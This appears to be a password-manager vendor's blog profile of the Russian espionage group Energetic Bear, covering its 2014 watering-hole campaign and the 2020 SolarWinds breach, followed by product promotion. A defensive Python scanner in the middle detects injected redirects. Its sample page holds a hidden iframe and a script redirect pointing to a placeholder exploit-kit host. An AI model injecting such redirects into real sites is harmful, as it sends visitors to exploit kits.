Energetic Bear is one of Russia's oldest known cyberespionage groups. Active since around 2005, it primarily attacks US infrastructure, with a preference for the energy sector.
US intelligence has linked Energetic Bear to Russia's FSB (the successor to the Soviet-era KGB), but it is unclear whether the group works directly for Russian intelligence or operates as a contractor. There is speculation that Energetic Bear moonlights as a criminal gang to obscure its direct ties to the Russian government.
Who is Energetic Bear?
Energetic Bear is a Russian advanced persistent threat that regularly attacks US government infrastructure, including private contractors, to gather intelligence.
While Energetic Bear seems to focus on the United States, German intelligence linked the group to several 2020 attacks against the country's energy, water, and power sectors.
Energetic Bear got its name from CrowdStrike, whose naming scheme gives each group an adjective as its codename and uses "Bear" for any group it assesses as operating out of Russia.
Energetic Bear Aliases
- Berserk Bear (used about as often as Energetic Bear to refer to the group)
- Crouching Yeti
- Dragonfly 2.0 (there is some indication that this is a sub-group or close affiliate of Energetic Bear)
- Havex (the name of one of the group's custom malware families, also applied to the group itself)
- IRON LIBERTY
What does Energetic Bear do?
Energetic Bear's primary goal is to collect intelligence and steal intellectual property from the energy industry, but it has also repeatedly targeted aviation networks.
What makes Energetic Bear unusual among advanced persistent threat groups is its focus. Many cyberespionage groups go after any multinational or government organization they can reach; Energetic Bear rarely strays far from utility infrastructure.
US intelligence agencies and security analysts have warned that Energetic Bear's access to SLTT (state, local, tribal, and territorial) government networks could be used to delegitimize those entities. That, in turn, could destabilize the country (or regions) and be used to influence elections.
The group uses several modes of attack, including spear-phishing, watering hole attacks, and trojanizing legitimate software installers so that victims infect themselves.
Much of its toolset is custom-built, and its patient, methodical approach lets Energetic Bear remain undetected for long periods.
Famous Energetic Bear Attacks
Active since around 2005, Energetic Bear has been involved in many cyber attacks. The group is also known for mimicking other hacker groups, which makes it difficult to know the full extent of its activity.
LightsOut Exploit - 2014
In 2014, Energetic Bear (tracked as Dragonfly at the time) used watering hole attacks to target multiple organizations in the energy sector.
Dragonfly compromised the website of a law firm that works with US energy companies and injected a redirect that silently sent visitors to a site hosting the LightsOut exploit kit.
LightsOut runs on the attacker's server, not in the victim's browser. It fingerprints the visiting browser and its plug-ins to pick an exploit that will work against that device, then uses the exploit to drop and install malicious payloads, the group's Havex remote access trojan among them.
With the trojan installed, Energetic Bear could monitor the device, including its configuration, clipboard contents, and keystrokes. That information let the group harvest credentials and configuration details for logging in to further systems and networks.
Reports are vague about the extent of Energetic Bear's victims or the data compromised during the 2014 attacks.
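The injected-redirect half of this attack is something a site owner can check for in their own pages. The following is an added example, not code from the original article and not an artifact of the Dragonfly campaign: a standard-library Python scanner that flags elements sending visitors off-site, namely hidden 0x0 iframes, meta refreshes, and scripts that rewrite window.location. The sample page and the hostnames in it are constructed for the example and are not real indicators.

```python
"""Flag injected off-site redirects in a web page (the watering-hole pattern).

Added example using only the Python standard library. The sample page below is
constructed; ek-landing.example.net and www.example-lawfirm.com are placeholders."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes that make an element load or navigate to another URL.
_URL_ATTRS = {"iframe": "src", "script": "src", "object": "data", "embed": "src"}
# window.location = "..."; location.href = "..."; top.location = "..."; document.location.href = "..."
_JS_REDIRECT = re.compile(
    r"""(?:window\.)?(?:location|top\.location|document\.location)(?:\.href)?\s*=\s*["']([^"']+)["']""",
    re.I)
# content="0;url=http://..." in a <meta http-equiv="refresh">
_META_REFRESH = re.compile(r"url\s*=\s*([^;\s'\"]+)", re.I)


def _offsite(url, site_host):
    """True when the URL has a host and it is not the site's own host.
    Scheme-relative URLs (//evil.example/x) count as off-site too."""
    host = urlparse(url).hostname
    return bool(host) and host.lower() != site_host.lower()


class RedirectFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []        # list of (reason, url)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)           # HTMLParser lower-cases attribute names
        if tag == "script":
            self._in_script = True
        if tag in _URL_ATTRS:
            url = a.get(_URL_ATTRS[tag])
            if url and _offsite(url, self.site_host):
                reason = f"off-site <{tag}>"
                # A zero-sized or hidden iframe is the classic injected-redirect tell.
                style = (a.get("style") or "").replace(" ", "").lower()
                if tag == "iframe" and (a.get("width") == "0" or a.get("height") == "0"
                                        or "display:none" in style or "visibility:hidden" in style):
                    reason = "hidden off-site <iframe>"
                self.findings.append((reason, url))
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = _META_REFRESH.search(a.get("content") or "")
            if m and _offsite(m.group(1), self.site_host):
                self.findings.append(("meta refresh", m.group(1)))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline <script> bodies arrive here; look for location rewrites.
        if self._in_script:
            for m in _JS_REDIRECT.finditer(data):
                if _offsite(m.group(1), self.site_host):
                    self.findings.append(("javascript redirect", m.group(1)))


def find_offsite_redirects(html, site_host):
    """Return [(reason, url), ...] for every off-site redirect found in html."""
    p = RedirectFinder(site_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: a law-firm page with an injected hidden iframe and an
# injected script redirect alongside legitimate same-site content.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script>window.location.href = "http://ek-landing.example.net/gate.php";</script>
</head><body>
<h1>Energy Practice Group</h1>
<iframe src="http://ek-landing.example.net/index.php" width="0" height="0" style="display:none"></iframe>
<iframe src="https://www.example-lawfirm.com/maps" width="400" height="300"></iframe>
</body></html>"""

if __name__ == "__main__":
    for reason, url in find_offsite_redirects(SAMPLE_PAGE, "www.example-lawfirm.com"):
        print(f"{reason}: {url}")
```

Run it against a page fetched from your own site (or a stored copy) and diff the findings against the third-party hosts you expect, such as analytics or CDN domains; anything else is worth a look, and a hidden off-site iframe is almost never legitimate.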
United States Federal Government Data Breach - 2020
Energetic Bear was named early on as a suspect in one of the worst cyberespionage incidents in United States history, although the campaign has since been formally attributed by the US government to Russia's SVR, the service behind Cozy Bear (APT29).
The 2020 intrusion reached multiple US federal institutions, including the US Treasury Department, the National Telecommunications and Information Administration, the US Department of Commerce, and many more.
Beyond the United States, the attackers accessed data affecting NATO, the UK government, the European Parliament, and at least 200 other foreign organizations.
The attackers used multiple entry points, and investigators estimate they were active inside victim networks for eight to nine months before being detected.
The primary entry point was a trojanized update to SolarWinds's Orion network-management software, which gave the attackers a foothold in every customer that installed it. From there, flaws in Microsoft and VMware products were reportedly exploited to reach emails and other documents that fed follow-on spear-phishing.
Early reporting speculated about a coordinated effort by several Russian cyberespionage groups, including Energetic Bear, Fancy Bear, and Cozy Bear; the US government's formal attribution in April 2021 named the SVR, that is, Cozy Bear.
Is Your Company Prepared for Cyber Attacks?
Stopping attackers like Energetic Bear is difficult but not impossible. However clever the tactics and malware they use to infect a user's PC, they still need working login credentials to turn that foothold into full access.
A password manager lets team members sign in to systems, accounts, and web applications without typing or even seeing raw credentials, so a keylogger on their device captures nothing useful. Malware with full control of an endpoint can still reach what the browser fills in, which is why the manager's two-factor authentication and prompt removal of access matter just as much as the vault itself.
Protecting Your Business with TeamPassword
TeamPassword is a robust password manager designed for sharing credentials safely amongst team members, contractors, and freelancers.
Instead of handling raw credentials, team members use one of TeamPassword's browser extensions (Chrome, Firefox, and Safari) to log in to apps, software, and online accounts.
You can create groups for sharing passwords and grant access only to those who need it. Because team members sign in through TeamPassword, they never see the actual password, which mitigates the risk of unauthorized credential sharing.
And, when a team member no longer needs access, remove them with one click. No need to change passwords every time someone leaves a project!
If you need to rotate credentials, TeamPassword's built-in password generator creates a unique 12- to 32-character random password instantly, and the new credentials are synced to every user with access.
One of TeamPassword's most important security features is two-factor authentication (2FA). With 2FA enabled, team members must also enter a one-time code from Google Authenticator to access their TeamPassword account, so even attackers who steal a login password cannot get in without the second factor.
Another useful security feature is TeamPassword's activity log and email notifications. The activity log records every user action in TeamPassword, making it easy to identify who is responsible for unauthorized credential sharing or suspicious login attempts.
Additionally, you can set up email notifications to live-track every TeamPassword action (logins, password sharing, new accounts, and more).
Secure Your Company's Digital Assets Today!
Stop sharing passwords in spreadsheets and emails, which exposes your business, customers, and clients to cyber attacks!
Sign up for a 14-day TeamPassword trial and test our robust password manager with your team.